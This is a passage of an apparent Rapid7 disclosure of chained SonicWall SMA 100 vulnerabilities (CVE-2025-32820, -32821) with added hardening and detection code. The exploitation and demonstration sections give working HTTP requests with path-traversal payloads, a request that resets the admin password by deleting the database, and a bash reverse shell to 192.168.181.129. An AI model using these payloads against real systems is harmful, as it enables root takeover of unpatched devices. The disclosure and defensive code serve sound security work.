clientApi.add_resource(AdLogonScriptResource, '/adlogonscript')

The NxPostConnectionScriptFileResource endpoint sounds promising, since it deals with file operations. Within nxpostconnectionscript.py, we find the API endpoint logic for POST requests. A file input parameter called upfile is expected ([J]). A sanitized file name is extracted using secure_filename (to prevent path traversal) and assigned to the tmp_file variable ([K]). Then, the file contents are stored in tmp_file’s location. A file operation command is also executed using os.system, with the tmp_file argument sanitized using shlex.quote to prevent command injection ([L]).

This is all handled well. However, while the tmp_file path was created safely, the application later needs to reference just the file name without the prepended /tmp directory. In order to do so, it defines a new filePath variable by directly concatenating the unsanitized file.filename string with a different directory path ([M]). This is then wrapped in shlex.quote, appended to the string “chmod 777 ”, and executed using os.system ([N]). No command injection is possible, since the command string is appropriately escaped. Despite this, shlex.quote does not remove path traversal sequences, so a relative traversal file name can be supplied by the attacker to execute “chmod 777” as root on any path of the attacker’s choosing.

    @swagger.doc(postDocument)
    def post(self):
        post_reqparser = reqparse.RequestParser()
        post_reqparser.add_argument('upfile', required = True, type = FileStorage, location = 'files') # [J]
        args = post_reqparser.parse_args()

        [..SNIP..]

        # store file in /tmp for examination
        file = request.files['upfile']
        tmp_file = '/tmp/' + secure_filename(file.filename) # [K]
        file.save(tmp_file)

        fileSize = os.stat(tmp_file).st_size
        if (fileSize > smaApi.MAX_SCRIPT_FILE_LEN or fileSize == 0):
            cmd = "rm -rf {}".format(shlex.quote(tmp_file)) # [L]
            os.system(cmd)
            raise BadRequest(getMessage(API_ERR_CODE_CLIENT_FILE_SIZE_INVALID).format(int(smaApi.MAX_SCRIPT_FILE_LEN / 1024)))

        # check dir exists or not and if not create it
        if (not os.path.exists(smaApi.POST_SCRIPTS_DIR)):
            cmd = "mkdir {}; chmod 777 {}".format(shlex.quote(smaApi.POST_SCRIPTS_DIR), shlex.quote(smaApi.POST_SCRIPTS_DIR))
            os.system(cmd)

        if (not os.path.exists(smaApi.POST_SCRIPTS_DESC_DIR)):
            cmd = "mkdir {}; chmod 777 {}".format(shlex.quote(smaApi.POST_SCRIPTS_DESC_DIR), shlex.quote(smaApi.POST_SCRIPTS_DESC_DIR))
            os.system(cmd)

        # move file to its destination
        cmd = "mv {} {}".format(shlex.quote(tmp_file), shlex.quote(smaApi.POST_SCRIPTS_DIR))
        os.system(cmd)
        filePath = smaApi.POST_SCRIPTS_DIR + '/' + file.filename # [M]
        cmd = "chmod 777 {}".format(shlex.quote(filePath)) # [N]
        os.system(cmd)
[..SNIP..]
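The join at [F] in download_tar ('/tmp/' + swcctn + '_' + timestamp) and the join at [M] above (POST_SCRIPTS_DIR + '/' + file.filename) fail for the same reason: a request-controlled string is glued onto a directory without ever being checked as a single file name, and shlex.quote applied afterwards only protects the shell, not the path. The following is an added Python example, not SonicWall’s code and not the vendor’s fix, that places both joins beside a hardened replacement. The replacement validates each component as one plain directory entry and then re-checks the normalised result against its base directory (the second layer also catches a symlinked entry). The POST_SCRIPTS_DIR value is assumed from the mv line in the pspy output later in the post; the demonstration inputs are the traversal strings already shown in the write-up.

```python
import os
import re

# /tmp is on the page; the postscripts directory is assumed from the pspy line
# "mv /tmp/bin /usr/src/EasyAccess/var/conf/postscripts" in the write-up.
TMP_DIR = "/tmp"
POST_SCRIPTS_DIR = "/usr/src/EasyAccess/var/conf/postscripts"

# One ordinary directory entry: conservative character set, no separators.
_SEGMENT_RE = re.compile(r"[A-Za-z0-9_.-]{1,128}")


class UnsafePath(ValueError):
    """Raised when an untrusted component would not stay inside its base directory."""


def is_safe_segment(part: str) -> bool:
    """True only for a single plain file name: no '/' or '\\', not '.' or '..'."""
    if part in (".", ".."):
        return False
    return _SEGMENT_RE.fullmatch(part) is not None


def resolve_within(base_dir: str, untrusted_name: str) -> str:
    """Return base_dir/untrusted_name, or raise UnsafePath.

    Layer 1 rejects anything that is not one segment.  Layer 2 resolves the
    joined path (symlinks included) and requires it to still sit under base_dir.
    """
    if not is_safe_segment(untrusted_name):
        raise UnsafePath(f"rejected path component {untrusted_name!r}")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, untrusted_name))
    if os.path.commonpath([base, candidate]) != base:
        raise UnsafePath(f"{candidate!r} escapes {base!r}")
    return candidate


# --- the two joins as they appear on the page --------------------------------

def vulnerable_list_file_path(swcctn: str, timestamp: str) -> str:
    """download_tar, marker [F]: raw concatenation of two request parameters."""
    return "/tmp/" + swcctn + "_" + timestamp


def vulnerable_script_path(filename: str) -> str:
    """Post-connection script upload, marker [M]: file.filename is never sanitised."""
    return POST_SCRIPTS_DIR + "/" + filename


# --- hardened replacements ---------------------------------------------------

def safe_list_file_path(swcctn: str, timestamp: str) -> str:
    """Both halves must be plain tokens and the result must stay in /tmp.
    (A server-generated random name would be better still: the client never
    needs to choose this file name at all.)"""
    if not (is_safe_segment(swcctn) and is_safe_segment(timestamp)):
        raise UnsafePath("swcctn and timestamp must be plain tokens")
    return resolve_within(TMP_DIR, swcctn + "_" + timestamp)


def safe_script_path(filename: str) -> str:
    """Use the validated name for the chmod target, not the raw upload name."""
    return resolve_within(POST_SCRIPTS_DIR, filename)


def is_rejected(fn, *args) -> bool:
    """Demonstration helper: True if fn(*args) raises UnsafePath."""
    try:
        fn(*args)
    except UnsafePath:
        return True
    return False


if __name__ == "__main__":
    # Inputs copied from the requests shown in the write-up.
    swcctn = "../usr/src/EasyAccess/www/python/authentication"
    timestamp = "api/../../../../../../tmp/rootfile"
    upload_name = "../../../../../../../../../bin/"
    print("[F] vulnerable:", vulnerable_list_file_path(swcctn, timestamp))
    print("[M] vulnerable:", vulnerable_script_path(upload_name))
    print("[F] hardened rejects:", is_rejected(safe_list_file_path, swcctn, timestamp))
    print("[M] hardened rejects:", is_rejected(safe_script_path, upload_name))
    print("hardened accepts:", safe_script_path("post.sh"))
```

Note that a containment check on its own would not have helped at [F]: the write-up’s own request resolves to /tmp/rootfile, which is inside /tmp, so the per-segment validation (or a server-chosen name) is the layer that actually matters there; the realpath check is defence in depth.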

Exploitation

This is a niche primitive, since we do not control the command being executed. Fortunately, making any directory world-writable is exactly what we need to weaponize CVE-2025-32821, our arbitrary low-privilege file write as nobody. We’ll perform a web request to the vulnerable API endpoint as the lowpriv user. In that request, we’ll set upfile to a relative traversal sequence into /bin, which is on the root user’s PATH.

POST /__api__/v1/client/nxpostconnectionscript/file HTTP/1.1
Host: 192.168.181.150
Cookie: swap="MUZTMTExT29UVW1UZ0p2aURTQThWYzlLTmV3TEp3dGR5a0FzR3h6aEY2RT0="; swcctn=kg02nQOWI0JEdgI9OyK4i2EJyvP0Zfy0
Sec-Ch-Ua: "Chromium";v="135", "Not-A.Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIpPybfdplJ1hIwzq
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive
Content-Length: 213

------WebKitFormBoundaryIpPybfdplJ1hIwzq
Content-Disposition: form-data; name="upfile"; filename="../../../../../../../../../bin/"

01
------WebKitFormBoundaryIpPybfdplJ1hIwzq--

Our pspy monitor logs two commands being executed as root. The first command’s file path is sanitized using secure_filename, but the second is only sanitized using shlex.quote, resulting in a traversal to /bin.

CMD: UID=0     PID=15082  | sh -c mv /tmp/bin /usr/src/EasyAccess/var/conf/postscripts
CMD: UID=0     PID=15083  | sh -c chmod 777 /usr/src/EasyAccess/var/conf/postscripts/../../../../../../../../../bin/

Exploitation is confirmed with our console root shell, which shows that the /bin directory is now world-writable.
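To see why shlex.quote does not help here, the following Python, added as an example and not taken from the appliance’s code or the original post, rebuilds the chmod target the way lines [M] and [N] do, shows where the kernel actually applies the chmod once the path is normalized, and then gives a hardened replacement that whitelists the filename, checks containment in the destination directory and avoids the shell entirely. POST_SCRIPTS_DIR mirrors smaApi.POST_SCRIPTS_DIR as seen in the pspy output; the helper names and the 0750 mode are choices made for this example.

```python
"""Why shlex.quote() does not stop path traversal.

Added example, not code from the SonicWall appliance or the original post.
The vulnerable handler builds the chmod target as POST_SCRIPTS_DIR + '/' +
file.filename and only passes it through shlex.quote() before os.system().
shlex.quote() protects the shell parser, not the filesystem: '.', '/' and
'-' are all "safe" characters to it, so a traversal sequence passes through
untouched.  The hardened variant applies a secure_filename()-style whitelist
and a containment check, and never shells out.
"""
import os
import re
import shlex

# Assumed to mirror smaApi.POST_SCRIPTS_DIR (value taken from the pspy output).
POST_SCRIPTS_DIR = "/usr/src/EasyAccess/var/conf/postscripts"

_UNSAFE_CHARS = re.compile(r"[^A-Za-z0-9_.-]")


def vulnerable_chmod_command(filename, base=POST_SCRIPTS_DIR):
    """Reproduces the pattern at [M]/[N]: string concatenation plus shlex.quote()."""
    file_path = base + "/" + filename
    return "chmod 777 {}".format(shlex.quote(file_path))


def effective_target(command):
    """Where the chmod actually lands: the normalised last argument of the command."""
    target = shlex.split(command)[-1]
    return os.path.normpath(target)


def sanitize_filename(filename):
    """secure_filename()-style whitelist: basename only, ASCII word chars, no dot-only names."""
    name = os.path.basename(filename.replace("\\", "/"))
    name = _UNSAFE_CHARS.sub("_", name).strip("._")
    if not name:
        raise ValueError("empty or dot-only filename rejected: %r" % filename)
    return name


def safe_script_path(filename, base=POST_SCRIPTS_DIR):
    """Returns an absolute path guaranteed to lie inside base, or raises ValueError."""
    candidate = os.path.normpath(os.path.join(base, sanitize_filename(filename)))
    # Belt and braces: even a sanitised name must still resolve inside base.
    # On a live system, realpath() the base first so symlinks cannot escape it.
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("path escapes %s: %s" % (base, candidate))
    return candidate


def install_post_script(tmp_file, filename, base=POST_SCRIPTS_DIR):
    """Hardened replacement for the mv / chmod 777 sequence: no shell, no 777."""
    dest = safe_script_path(filename, base)
    os.makedirs(base, mode=0o750, exist_ok=True)
    os.replace(tmp_file, dest)  # atomic rename instead of `sh -c mv`
    os.chmod(dest, 0o750)       # owner/group only, never world-writable
    return dest


if __name__ == "__main__":
    evil = "../../../../../../../../../bin/"
    cmd = vulnerable_chmod_command(evil)
    print(cmd)                    # the traversal survives shlex.quote() verbatim
    print(effective_target(cmd))  # /bin
    try:
        safe_script_path(evil)
    except ValueError as exc:
        print("rejected:", exc)
```

The point of separating sanitize_filename from the containment check is that each defends against a different mistake: the whitelist stops traversal and odd bytes in the name, while the commonpath check catches any future code path that builds a destination from attacker input without going through the whitelist.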

Multiple vulnerabilities in SonicWall SMA 100 series (FIXED)

CVE-2025-32821

An authenticated attacker with administrator privileges can inject shell command arguments with an escape sequence to upload a fully controlled file anywhere that the nobody user can write to. This can be chained with CVE-2025-32820 to establish root-level remote code execution on the SMA research target running 10.2.1.14-75sv. It’s also possible to copy existing files that the nobody user can read, such as /etc/passwd or the application’s SQLite database, to the web root directory for data exfiltration.

We’ll start by taking a look at the main function in /cgi-bin/importlogo.

After confirming the user is an authenticated administrator and the HTTP method is “POST”, the application checks for the presence of an integer parameter called updateFavicon ([O]). If this is set to “1”, and if the defaultFavicon parameter is “0”, the application calls FUN_0804a0f0 with the first argument set to a FILE pointer from the multipart form file parameter called favicon1 ([P]). After some basic validation checks, such as file size, FUN_0804a0f0 writes the uploaded file to disk at /usr/src/EasyAccess/www/htdocs/themes/favicon1.ico. Next, the portalName POST parameter is fetched and passed through safeSystemCmdArg2 ([Q]). This is a security function that searches for command injection characters, such as $, \n, ;, |, <, >, ^, and `. If any of those characters are detected, the function returns the string truncated at the first such character. Then, a format string is populated with the sanitized portalName value to craft the shell command cp -f /usr/src/EasyAccess/www/htdocs/themes/favicon1.ico /usr/src/EasyAccess/uiaddon/{portalName_VALUE}/favicon.ico ([R]), and the command is executed via system_s_quiet ([S]), a wrapper for system that runs in the context of nobody.

[..SNIP..]
  if (initCgi() < 0) {
    return -1;
  }

  getCookie("swap",cookieBuffer);

  initClientApi();
  cspInit();

  reqMethod = (char *)gcgiFetchEnvVar(4);
  uVar9 = dbhGet(0);

  sessionHandle = sessionGetAndRefresh(uVar9,cookieBuffer);

  if (sessionHandle == 0) {
    gcgiSendStatus(401);
    return 0;
  }
  respJson = cJSON_CreateObject();
  messageJsonArray = cJSON_CreateArray();

  if ((respJson == 0) || (messageJsonArray == 0)) {
    return 0;
  }

  maybeResult = userRolePermissionCheck(sessionHandle,reqMethod);
  if (maybeResult == 1) {
    pcVar5 = "You have no permission to view this page";

LAB_0804948a:
    addWarningMessage(messageJsonArray,"error",pcVar5);
  }
  else {
    if (maybeResult == 2) {
      pcVar5 = "Read-only administrator";
      goto LAB_0804948a;
    }

    if (maybeResult == 0) {
      maybeResult = strcmp(reqMethod,"POST");

      if (maybeResult != 0) goto LAB_080493e8;

      if (doCSRFTokenCheck(sessionHandle) != 1) {
        exit(-1);
      }

      setuid(0);
      setgid(0);
      seteuid(0);
      setegid(0);
      
      gcgiFetchInteger("updateFavicon",&updateFaviconFlag,0);
      
      if (updateFaviconFlag == 1) { // [O]
        maybeResult = gcgiFetchInteger("defaultFavicon",&useDefaultFavicon,0);
        bVar1 = nullptr;

        if (useDefaultFavicon == 0) {
          maybeResult = FUN_0804a0f0("favicon1","favicon1.ico",maybeResult); // [P]
          bVar1 = 0 < maybeResult;
        }

        maybeResult = gcgiFetchString("portalName",portalNameBuffer,0x80);

        if (maybeResult == 0) {
          if (useDefaultFavicon == 0) { 
            if (bVar1) {
              uVar9 = safeSystemCmdArg2(portalNameBuffer,"-"); // [Q]
              baseInstallDir = "/usr/src/EasyAccess";
              __snprintf_chk(pcVar5,0x180,1,0x180,
                             "cp -f %s/www/htdocs/themes/favicon1.ico %s/uiaddon/%s/favicon.ico",
                           "/usr/src/EasyAccess","/usr/src/EasyAccess",uVar9,"/usr/src/EasyAccess"
                            ); // [R]
              system_s_quiet(pcVar5); // [S]
[..SNIP..]

Note that the provided portal name is not validated as a legitimate web portal name at any point in this code path; it is only checked against valid portal names when updateFavicon is not set. So, we don’t need to provide a valid portal name. Additionally, although the portal name is filtered for command injection characters, it is not checked for path traversal sequences, it is not URL encoded, and hash symbols are not truncated. As a result, an attacker can provide a portalName value containing a traversal sequence to a different file path, followed by a space and a hash symbol, which turns the trailing “/favicon.ico” into a shell comment.

The result is that the attacker can upload their own fully controlled file and exploit the limited command injection to write it with any file name they’d like to any directory that nobody can write to.
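The following Python, added here as an example rather than taken from SonicWall’s binary or the post’s PoC, models safeSystemCmdArg2 as the post describes it (truncate at the first blocklisted character) and then lets shlex reproduce how sh parses the resulting cp command, so the effect of the trailing space-and-hash can be checked without an appliance. BLOCKED is the character set the post lists and is assumed to be complete; PORTAL_NAME and validate_portal_name are a hardened replacement of this example’s own design, not the vendor’s fix.

```python
"""Modelling safeSystemCmdArg2 and why a trailing `#` defeats it.

Added example; this is not SonicWall's code or the post's PoC.  The
truncate-at-first-hit behaviour follows the post's description of
safeSystemCmdArg2; BLOCKED is the character list given in the post and is
assumed to be complete.  The hardened variant swaps the blocklist for an
allowlist and an argv-style invocation, which is what removes the comment
trick: with shell=False there is no shell to interpret `#` or spaces.
"""
import os
import re
import shlex

BASE = "/usr/src/EasyAccess"
BLOCKED = set("$\n;|<>^`")                          # per the post; assumed complete
PORTAL_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}$")  # this example's allowlist, not the vendor's


def safe_system_cmd_arg2(value):
    """Blocklist sanitizer as described: the prefix before the first blocked character."""
    for i, ch in enumerate(value):
        if ch in BLOCKED:
            return value[:i]
    return value


def build_cp_command(portal_name):
    """The format string from [R], fed with the 'sanitized' portal name."""
    return "cp -f %s/www/htdocs/themes/favicon1.ico %s/uiaddon/%s/favicon.ico" % (
        BASE, BASE, safe_system_cmd_arg2(portal_name))


def shell_argv(command):
    """What `sh -c` hands to cp: shlex drops everything from an unquoted `#` word onward."""
    return shlex.split(command, comments=True)


def cp_destination(command):
    """Normalised destination path cp will actually write to."""
    return os.path.normpath(shell_argv(command)[-1])


def validate_portal_name(portal_name, known_portals):
    """Allowlist: shape check first, then membership in the configured portal set."""
    if not PORTAL_NAME.match(portal_name):
        raise ValueError("portal name has disallowed characters: %r" % portal_name)
    if portal_name not in known_portals:
        raise ValueError("unknown portal: %r" % portal_name)
    return portal_name


def hardened_cp_argv(portal_name, known_portals):
    """argv for subprocess.run(argv, shell=False): no shell, so no comments, no word splitting."""
    name = validate_portal_name(portal_name, known_portals)
    dest = os.path.normpath(os.path.join(BASE, "uiaddon", name, "favicon.ico"))
    if os.path.commonpath([BASE, dest]) != BASE:
        raise ValueError("destination escapes %s: %s" % (BASE, dest))
    return ["cp", "-f", os.path.join(BASE, "www/htdocs/themes/favicon1.ico"), dest]


if __name__ == "__main__":
    evil = "../../../../../../usr/src/EasyAccess/www/htdocs/test.txt #"
    cmd = build_cp_command(evil)
    print(cmd)                  # matches the pspy capture, minus the 2>/dev/null
    print(shell_argv(cmd))      # the '#/favicon.ico' suffix is gone
    print(cp_destination(cmd))  # /usr/src/EasyAccess/www/htdocs/test.txt
    print(hardened_cp_argv("VirtualOffice", {"VirtualOffice"}))
```

shlex.split with comments=True is a close enough model of sh for this input because the `#` is preceded by a space; real shells treat a `#` inside a word as literal, which shlex does not, so use it for reasoning about payloads, not as a drop-in shell parser.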

Exploitation

We can perform the web request depicted below to exploit this arbitrary file write.

POST /cgi-bin/importlogo HTTP/1.1
Host: 192.168.181.150
Cookie: ajaxUpdates=OFF; swap="NVlSSVc1MVdtb0syYWFybFdUdHFEcG9hRjZpMWlyaThlY0FmdlNQRlRhOD0="; swcctn=aXJANYBXJMy46YLSIApSwSoRIWkYRkR5
Content-Length: 554
Sec-Ch-Ua-Platform: "Windows"
X-Csrf-Token: aXJANYBXJMy46YLSIApSwSoRIWkYRkR5
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Chromium";v="135", "Not-A.Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXOj6BtGNhEubdWvN
Origin: https://192.168.181.152
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://192.168.181.152/
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive

------WebKitFormBoundaryXOj6BtGNhEubdWvN
Content-Disposition: form-data; name="portalName"

../../../../../../usr/src/EasyAccess/www/htdocs/test.txt #
------WebKitFormBoundaryXOj6BtGNhEubdWvN
Content-Disposition: form-data; name="defaultFavicon"

0
------WebKitFormBoundaryXOj6BtGNhEubdWvN
Content-Disposition: form-data; name="updateFavicon"

1
------WebKitFormBoundaryXOj6BtGNhEubdWvN
Content-Disposition: form-data; name="favicon1"; filename="TESTING.gif"
Content-Type: image/gif

CONTENT
------WebKitFormBoundaryXOj6BtGNhEubdWvN--

Our pspy monitor logs the following command being executed as UID 99 (nobody).

2025/05/01 12:10:47 CMD: UID=99    PID=3243   | sh -c cp -f /usr/src/EasyAccess/www/htdocs/themes/favicon1.ico /usr/src/EasyAccess/uiaddon/../../../../../../usr/src/EasyAccess/www/htdocs/test.txt #/favicon.ico 2>/dev/null

As expected, the test.txt file has been written to the web root.

We also note that the uploaded file has the executable bit set by default.

# ls -lha /usr/src/EasyAccess/www/htdocs/test.txt
-rwx------ 1 nobody nobody 7 May  1 12:10 /usr/src/EasyAccess/www/htdocs/test.txt

This detail is useful for exploitation, since it will facilitate easily writing an executable file to a directory on the root PATH for arbitrary remote code execution.

Chained Impact

The vulnerabilities disclosed in this document permit an attacker with SMA SSLVPN low-privilege user credentials to perform the following five steps:

  1. Exploit CVE-2025-32819 to delete the primary SQLite database and reset the password of the default SMA admin user.
  2. Login as admin to the SMA web interface.
  3. Exploit CVE-2025-32820 to make the SMA appliance’s /bin directory world-writable.
  4. Exploit CVE-2025-32821 to write the file /bin/lsb_release. This executable is not installed by default, but we observed that an automated job on the appliance routinely attempts to execute it as root every few minutes.
  5. Wait for sh -c lsb_release to be executed automatically. When this happens, the attacker gains root-level remote code execution on the SMA device.
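For defenders, the same chain leaves a recognisable trail in process telemetry. The detector below is an added example, not part of the original post: it parses pspy-style lines (the post’s captured lines reused as constructed sample input, plus a benign one) and flags traversal sequences in command arguments, chmod 777 on a directory on root’s PATH, and a shell command truncated by a # comment. ROOT_PATH_DIRS is an assumption about the appliance’s PATH.

```python
"""Spotting the SMA exploit chain in process-execution telemetry.

Added example, not part of the original post.  It parses pspy-style lines
and flags three things the chain cannot avoid producing: a path traversal
in a command argument, `chmod 777` landing on a directory on root's PATH,
and a `sh -c` command cut short by a `#` comment.  ROOT_PATH_DIRS is an
assumption about the appliance's PATH; SAMPLE_LOG reuses the post's
captured lines plus one benign command as constructed input.
"""
import os
import re
import shlex

PSPY_LINE = re.compile(r"CMD:\s+UID=(?P<uid>\d+)\s+PID=(?P<pid>\d+)\s+\|\s+(?P<cmd>.*)$")
ROOT_PATH_DIRS = {"/bin", "/sbin", "/usr/bin", "/usr/sbin", "/usr/local/bin", "/usr/local/sbin"}
WORLD_WRITABLE_MODES = {"777", "0777", "a+w", "o+w", "+w"}
SHELL_PREFIXES = ("sh -c ", "bash -c ", "/bin/sh -c ", "/bin/bash -c ")

# Constructed sample: the post's three captured lines plus one benign command.
SAMPLE_LOG = """\
CMD: UID=0     PID=15082  | sh -c mv /tmp/bin /usr/src/EasyAccess/var/conf/postscripts
CMD: UID=0     PID=15083  | sh -c chmod 777 /usr/src/EasyAccess/var/conf/postscripts/../../../../../../../../../bin/
2025/05/01 12:10:47 CMD: UID=99    PID=3243   | sh -c cp -f /usr/src/EasyAccess/www/htdocs/themes/favicon1.ico /usr/src/EasyAccess/uiaddon/../../../../../../usr/src/EasyAccess/www/htdocs/test.txt #/favicon.ico 2>/dev/null
CMD: UID=0     PID=15090  | sh -c ls -la /tmp
"""


def parse_pspy(line):
    """Returns {'uid', 'pid', 'cmd'} or None for lines that are not process events."""
    m = PSPY_LINE.search(line)
    if not m:
        return None
    return {"uid": int(m.group("uid")), "pid": int(m.group("pid")), "cmd": m.group("cmd")}


def shell_string(cmd):
    """pspy prints argv space-joined, so the `sh -c` payload is everything after the prefix."""
    for prefix in SHELL_PREFIXES:
        if cmd.startswith(prefix):
            return cmd[len(prefix):]
    return cmd


def analyse(line):
    """Returns a list of (rule, detail) findings for one pspy line; empty means clean."""
    rec = parse_pspy(line)
    if rec is None:
        return []
    shell = shell_string(rec["cmd"])
    findings = []
    comment = re.search(r"(?:^|\s)(#.*)$", shell)
    if comment:
        findings.append(("shell_comment", comment.group(1)))
    try:
        argv = shlex.split(shell, comments=True)
    except ValueError:
        return findings + [("unparseable", shell)]
    if not argv:
        return findings
    for arg in argv[1:]:
        if "/../" in arg or arg.startswith("../"):
            findings.append(("path_traversal", os.path.normpath(arg)))
    if argv[0] == "chmod" and len(argv) >= 3 and argv[1] in WORLD_WRITABLE_MODES:
        for target in argv[2:]:
            if os.path.normpath(target) in ROOT_PATH_DIRS:
                findings.append(("world_writable_path_dir", os.path.normpath(target)))
    return findings


def scan(log_text):
    """Maps each flagged line to its findings; clean lines are omitted."""
    report = {}
    for line in log_text.splitlines():
        hits = analyse(line)
        if hits:
            report[line] = hits
    return report


if __name__ == "__main__":
    for flagged, hits in scan(SAMPLE_LOG).items():
        print(flagged)
        for rule, detail in hits:
            print("    %-24s %s" % (rule, detail))
```

On the appliance the same three rules map naturally onto auditd execve records or any EDR process-creation stream; the traversal rule alone would have caught both CVE-2025-32820 and CVE-2025-32821 here, since neither exploit works without one.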

Demonstration

We’ll start by grabbing our low-privilege user’s cookies in our “assumed breach” scenario. This cookie string is swap="ZHNZZThVdlJzWHY1MkpWTDM0akFjbG9XWFgyd29Hdk1yVEtPZWdzSnJlbz0="; swcctn=LEj9kOzEjYibGOSEW9YE8ElgWwiOgigN.

Now, let’s reset the administrator’s password by exploiting CVE-2025-32819 and deleting the primary SQLite database. The SMA returns a 200 status with no body.

GET /fileshare/sonicfiles/?User=admin&Pass=null&Domn=&RacNumber=44&Arg1=smb://192.168.200.1/test/&Arg2=null&swcctn=../usr/src/EasyAccess/www/python/authentication&timestamp=api/../../../../../../usr/src/EasyAccess/var/conf/persist.db HTTP/1.1
Host: 192.168.181.150
Cookie: swap="ZHNZZThVdlJzWHY1MkpWTDM0akFjbG9XWFgyd29Hdk1yVEtPZWdzSnJlbz0="; swcctn=LEj9kOzEjYibGOSEW9YE8ElgWwiOgigN
Sec-Ch-Ua: "Chromium";v="135", "Not-A.Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive

Refreshing the web page confirms it worked, though the application is not thrilled with our decision.

After a few seconds, the watchdog has had enough and the device is rebooted. When we refresh the page a couple of minutes later, things are looking as good as new.

After logging in using the credentials admin:password, we’re greeted with an end user product agreement, indicating that the device has been initialized.

We’ll input a free trial license key to get the device back in a functional state, though a real attacker would probably use a stolen one. Next, we’ll use our CVE-2025-32820 PoC to make /bin writable. The server should return a 500 error with the message “Failed to create description file.”

POST /__api__/v1/client/nxpostconnectionscript/file HTTP/1.1
Host: 192.168.181.150
Cookie: swap="amZEMjA1cVYwNXRzWDFmcDgzcVhEb3NNM2hFMHE4a0FTOFZTQTlDeE1kaz0="; swcctn=bGhJ8EJ9GMmKG7d3MggEEgd8R59gyFSv
Sec-Ch-Ua: "Chromium";v="135", "Not-A.Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIpPybfdplJ1hIwzq
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive
Content-Length: 181

------WebKitFormBoundaryIpPybfdplJ1hIwzq
Content-Disposition: form-data; name="upfile"; filename="../../../../../../../../../bin/"

01
------WebKitFormBoundaryIpPybfdplJ1hIwzq--

Lastly, we’ll set our sights on remote code execution as root by exploiting CVE-2025-32821. We throw the reverse shell PoC below at our victim and it responds with a 200 code and “success” in the body. Note that a hash symbol is also appended to our executable file contents: the file write occasionally seems to append a junk character to our command, though it doesn’t happen every time, so we comment out the rest of the line to avoid any unexpected additions.

POST /cgi-bin/importlogo HTTP/1.1
Host: 192.168.181.150
Cookie: swap="amZEMjA1cVYwNXRzWDFmcDgzcVhEb3NNM2hFMHE4a0FTOFZTQTlDeE1kaz0="; swcctn=bGhJ8EJ9GMmKG7d3MggEEgd8R59gyFSv
Content-Length: 567
Sec-Ch-Ua-Platform: "Windows"
X-Csrf-Token: bGhJ8EJ9GMmKG7d3MggEEgd8R59gyFSv
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Chromium";v="135", "Not-A.Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXOj6BtGNhEubdWvN
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive

------WebKitFormBoundaryXOj6BtGNhEubdWvN
Content-Disposition: form-data; name="portalName"

../../../../../../bin/lsb_release #
------WebKitFormBoundaryXOj6BtGNhEubdWvN
Content-Disposition: form-data; name="defaultFavicon"

0
------WebKitFormBoundaryXOj6BtGNhEubdWvN
Content-Disposition: form-data; name="updateFavicon"

1
------WebKitFormBoundaryXOj6BtGNhEubdWvN
Content-Disposition: form-data; name="favicon1"; filename="TESTING.gif"
Content-Type: image/gif

bash -i >& /dev/tcp/192.168.181.129/4242 0>&1 #
------WebKitFormBoundaryXOj6BtGNhEubdWvN--

One minute later, our reverse shell arrives and root-level remote code execution is confirmed.

Disclosure timeline

  • May 2, 2025: Rapid7 shares vulnerability details with SonicWall security contacts. The SonicWall team acknowledges the disclosure 30 minutes later and confirms that patch development work will begin.
  • May 4, 2025: The SonicWall security team states that a fixed build will be shared on May 5 for patch validation.
  • May 5, 2025: The SonicWall security team shares the 10.2.1.15 build with Rapid7. The Rapid7 team validates that the patch is effective.
  • May 6, 2025: The SonicWall security team states that the patch will be targeting a May 7 release date.
  • May 7, 2025: SonicWall releases v10.2.1.15 and publishes a security advisory. After confirming the patch is generally available, Rapid7 publishes this disclosure.

Exploring an Untethered, Unified Approach to CTEM

Post Syndicated from Joel Alcon original https://blog.rapid7.com/2025/05/07/exploring-an-untethered-unified-approach-to-ctem/

